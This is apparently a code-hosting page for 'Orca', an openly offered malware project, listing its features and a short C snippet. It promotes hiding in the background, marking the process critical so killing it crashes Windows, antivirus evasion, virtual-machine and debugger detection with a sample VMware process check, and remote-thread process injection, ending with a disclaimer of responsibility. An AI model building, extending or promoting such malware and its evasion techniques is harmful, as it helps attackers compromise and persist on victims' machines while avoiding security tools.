There are no reviews yet. Be the first to send feedback to the community and the maintainers!
Repository Details
Incomplete project
About Orca
Orca is an Advanced Malware with multifeatures written in ASM/C/C++
features
Run in Background (Hidden Mode)
Critical Process using RtlSetProcessIsCritical
RtlSetProcessIsCritical makes the process critical, any attempt to terminate it will BSOD the system (Blue Screen of Death) , although it can be bypassed easly using NtSetInformationProcess by injecting DLL into it , i made PoC of it you can check it from here BypassRtlSetProcessIsCritical
Undectable (60+ Antivirus )
Detecting Virtual Environment Files and Processes
Code Snippets
the following Function will search for VMware Processes
voidantiVm()
{
constchar* arr[] = { "vmtoolsd.exe","vmwaretray.exe","vmwareuser.exe" ,"VGAuthService.exe" ,"vmacthlp.exe" };
for (int i = 0; i < strlen(*arr); i++)
{
if (GetPID(arr[i]))
exit(EXIT_FAILURE);
}
}
the following Function will search for VirtualBox Files
the Malware will self close 'Silently' anytime detect a debugger or being debugged!! AntiDBG Library
The techniques that used to Detect debuggers :
- Memory
- CPU
- Timing
- Forced Exceptions
Process Injection
Process Injection It is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the processโs memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
TECHNICAL DETAILS
Open process with Access Rights
LPTHREAD_START_ROUTINE (its a pointer to the application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread and represents the starting address of the thread in the remote process. The function must exist in the remote process.)
VirtualAllocEx (used to allocate space from the target process virtual memory)
WriteProcessMemory (used to write the path of the shellcode into the allocated memory)
CreateRemoteThread (used to creates a thread in the virtual memory area of a process)
More Advanced features will be added soon
Disclaimer
I take no responsibility for Harmful using or any damage can make. Use it at your own risk.